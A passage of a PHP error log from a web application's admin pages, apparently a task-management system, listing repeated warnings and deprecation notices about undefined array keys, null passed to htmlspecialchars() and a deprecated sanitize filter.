/home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [25-Feb-2025 17:48:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Feb-2025 17:48:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [25-Feb-2025 17:48:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Feb-2025 17:02:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Feb-2025 17:02:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Feb-2025 17:02:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Mar-2025 09:01:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Mar-2025 09:01:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Mar-2025 09:01:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Mar-2025 09:08:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Mar-2025 09:08:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Mar-2025 11:52:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Mar-2025 11:54:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Mar-2025 11:54:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Mar-2025 04:19:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Mar-2025 04:20:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Mar-2025 04:20:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Mar-2025 16:27:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 16:28:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:11:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:11:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:12:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 